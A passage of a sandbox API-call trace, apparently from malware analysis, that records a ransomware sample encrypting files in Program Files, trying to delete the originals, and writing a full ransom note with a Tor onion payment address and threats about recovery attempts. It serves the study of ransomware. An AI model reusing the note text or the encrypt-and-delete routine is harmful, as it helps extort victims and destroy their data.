lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0161.241] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0161.241] CryptEncrypt (in: hKey=0x9ad2b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0161.241] GetLastError () returned 0x0 [0161.241] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0161.241] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0161.241] CryptEncrypt (in: hKey=0x9ad2b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0161.241] GetLastError () returned 0x0 [0161.241] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0161.241] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0161.241] CryptEncrypt (in: hKey=0x9ad2b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0161.241] GetLastError () returned 0x0 [0161.241] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0161.241] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0161.242] CryptEncrypt (in: hKey=0x9ad2b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0161.242] GetLastError () returned 0x0 [0161.242] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0161.242] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0161.242] CryptEncrypt (in: hKey=0x9ad2b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0161.242] GetLastError () returned 0x0 [0161.242] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0161.242] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0161.242] CryptEncrypt (in: hKey=0x9ad2b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0161.242] GetLastError () returned 0x0 [0161.242] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0161.242] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0161.242] CryptEncrypt (in: hKey=0x9ad2b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0161.242] GetLastError () returned 0x0 [0161.242] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0161.242] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0161.242] CryptEncrypt (in: hKey=0x9ad2b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0161.242] GetLastError () returned 0x0 [0161.242] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0161.242] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0161.242] CryptEncrypt (in: hKey=0x9ad2b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0161.242] GetLastError () returned 0x0 [0161.242] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0161.242] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0161.242] CryptEncrypt (in: hKey=0x9ad2b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0161.242] GetLastError () returned 0x0 [0161.243] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0161.243] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0161.243] CryptEncrypt (in: hKey=0x9ad2b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0161.243] GetLastError () returned 0x0 [0161.243] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0161.243] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0161.243] CryptEncrypt (in: hKey=0x9ad2b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0161.243] GetLastError () returned 0x0 [0161.243] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0161.243] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0161.243] CryptEncrypt (in: hKey=0x9ad2b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0161.243] GetLastError () returned 0x0 [0161.243] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0161.243] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0161.243] CryptEncrypt (in: hKey=0x9ad2b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0161.243] GetLastError () returned 0x0 [0161.243] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0161.243] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0161.243] CryptEncrypt (in: hKey=0x9ad2b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0161.243] GetLastError () returned 0x0 [0161.243] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0161.243] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0161.243] CryptEncrypt (in: hKey=0x9ad2b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0161.243] GetLastError () returned 0x0 [0161.244] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0161.244] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0161.244] CryptEncrypt (in: hKey=0x9ad2b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0161.244] GetLastError () returned 0x0 [0161.244] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0161.244] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0161.244] CryptEncrypt (in: hKey=0x9ad2b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0161.244] GetLastError () returned 0x0 [0161.244] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0161.244] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0161.244] CryptEncrypt (in: hKey=0x9ad2b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0161.244] GetLastError () returned 0x0 [0161.244] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0161.244] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0161.244] CryptEncrypt (in: hKey=0x9ad2b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0161.244] GetLastError () returned 0x0 [0161.244] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0161.244] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0161.244] CryptEncrypt (in: hKey=0x9ad2b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0161.244] GetLastError () returned 0x0 [0161.244] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0161.244] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0161.244] CryptEncrypt (in: hKey=0x9ad2b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0161.244] GetLastError () returned 0x0 [0161.244] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0161.244] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0161.245] CryptEncrypt (in: hKey=0x9ad2b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0161.245] GetLastError () returned 0x0 [0161.245] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0161.245] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0161.245] CryptEncrypt (in: hKey=0x9ad2b8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x110) returned 1 [0161.245] GetLastError () returned 0x0 [0161.245] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x110, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x110, lpOverlapped=0x0) returned 1 [0161.245] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x0, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x0, lpOverlapped=0x0) returned 1 [0161.245] WriteFile (in: hFile=0x588, lpBuffer=0x29012e8*, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesWritten=0x2d7e15c*=0x0, lpOverlapped=0x0) returned 1 [0161.245] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\zh-HK\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\zh-hk\\tipresx.dll.mui")) returned 0x20 [0161.245] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\zh-HK\\tipresx.dll.mui", dwFileAttributes=0x20) returned 0 [0161.245] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\zh-HK\\tipresx.dll.mui") returned 1 [0161.245] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\zh-HK\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\zh-hk\\tipresx.dll.mui")) returned 0 [0161.246] wcscpy (in: _Dest=0x2d7dcb4, _Source="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\zh-HK\\tipresx.dll.mui" | out: _Dest="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\zh-HK\\tipresx.dll.mui") returned="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\zh-HK\\tipresx.dll.mui" [0161.246] PathRemoveFileSpecW (in: pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\zh-HK\\tipresx.dll.mui" | out: pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\zh-HK") returned 1 [0161.246] GetTempFileNameW (in: lpPathName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\zh-HK", lpPrefixString=".xX", uUnique=0x0, lpTempFileName=0x2d7debc | out: lpTempFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\zh-HK\\.xXE937.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\zh-hk\\.xxe937.tmp")) returned 0xe937 [0161.246] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\zh-HK\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\zh-hk\\tipresx.dll.mui"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\zh-HK\\.xXE937.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\zh-hk\\.xxe937.tmp"), dwFlags=0x1) returned 0 [0161.246] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\zh-HK\\.xXE937.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\zh-hk\\.xxe937.tmp")) returned 1 [0161.247] CryptDestroyKey (hKey=0x9ad2b8) returned 1 [0161.247] wcslen (_String="OK") returned 0x2 [0161.247] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0161.247] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0161.247] CryptDestroyKey (hKey=0x9ad478) returned 1 [0161.247] CryptDestroyHash (hHash=0x9ad4b8) returned 1 [0161.247] CryptReleaseContext (hProv=0x8e3880, dwFlags=0x0) returned 1 [0161.247] FindNextFileW (in: hFindFile=0x9ad238, lpFindFileData=0x2d7e3bc | out: lpFindFileData=0x2d7e3bc) returned 0 [0161.247] GetLastError () returned 0x12 [0161.247] FindClose (in: hFindFile=0x9ad238 | out: hFindFile=0x9ad238) returned 1 [0161.247] _wfopen (_FileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\zh-HK\\Recovers your files.html" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\zh-hk\\recovers your files.html"), _Mode="w") returned 0x77ac1268 [0161.247] fputs (in: _Str=" Encrypted files!

Your Key: a8ba77dad846516d1a6737c4237beea3b25e325279bbf473010960209657e13a

Encrypted files!

All your files are encrypted.Using AES256-bit encryption and RSA-2048-bit encryption.
Making it impossible to recover files without the correct private key.
If you are interested in getting is the key and recover your files
You should proceed with the following steps.

The only way to decrypt your files safely is to buy the Descrypt and Private Key software.

Any attempts to restore your files with the third-party software will be fatal for your files!

Important use Firefox or Chrome browser

To proceed with the purchase you must access one of the link below

If neither of the links is online for a long period of time, there is another way to open it, you should install the Tor Browser

If your personal page is not available for a long period there is another way to open your personal page - installation and use of Tor Browser:

  1. run your Internet browser (if you do not know what it is run the Internet Explorer);
  2. enter or copy the address https://www.torproject.org/download/download-easy.html.en into the address bar of your browser and press ENTER;
  3. wait for the site loading;
  4. on the site you will be offered to download Tor Browser; download and run it, follow the installation instructions, wait until the installation is completed;
  5. run Tor Browser;
  6. connect with the button 'Connect' (if you use the English version);
  7. a normal Internet browser window will be opened after the initialization;
  8. type or copy the address

    https://lylh3uqyzay3lhrd.onion

    in this browser address bar;
  9. press ENTER;
  10. the site should be loaded; if for some reason the site is not loading wait for a moment and try again.
If you have any problems during installation or use of Tor Browser, please, visit https://www.youtube.com and type request in the search bar 'Install Tor Browser Windows' and you will find a lot of training videos about Tor Browser installation and use.

Your Key: a8ba77dad846516d1a6737c4237beea3b25e325279bbf473010960209657e13a
", _File=0x77ac1268 | out: _File=0x77ac1268) returned 0 [0161.248] fclose (in: _File=0x77ac1268 | out: _File=0x77ac1268) returned 0 [0161.248] wcslen (_String="Unfortunately crypted files: ") returned 0x1d [0161.248] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0161.248] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0161.248] wcslen (_String="Fortunately ignored files because of filters: ") returned 0x2e [0161.248] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0161.248] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0161.248] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\zh-TW\\*", pszSpec="*.exe") returned 0 [0161.248] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\zh-TW\\*", pszSpec="*.dll") returned 0 [0161.248] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\zh-TW\\*", pszSpec="*.lnk") returned 0 [0161.248] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\zh-TW\\*", pszSpec="*.bat") returned 0 [0161.248] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\zh-TW\\*", pszSpec="*.ini") returned 0 [0161.248] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\zh-TW\\*", pszSpec="*.msi") returned 0 [0161.248] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\zh-TW\\*", pszSpec="*.scf") returned 0 [0161.248] PathMatchSpecW 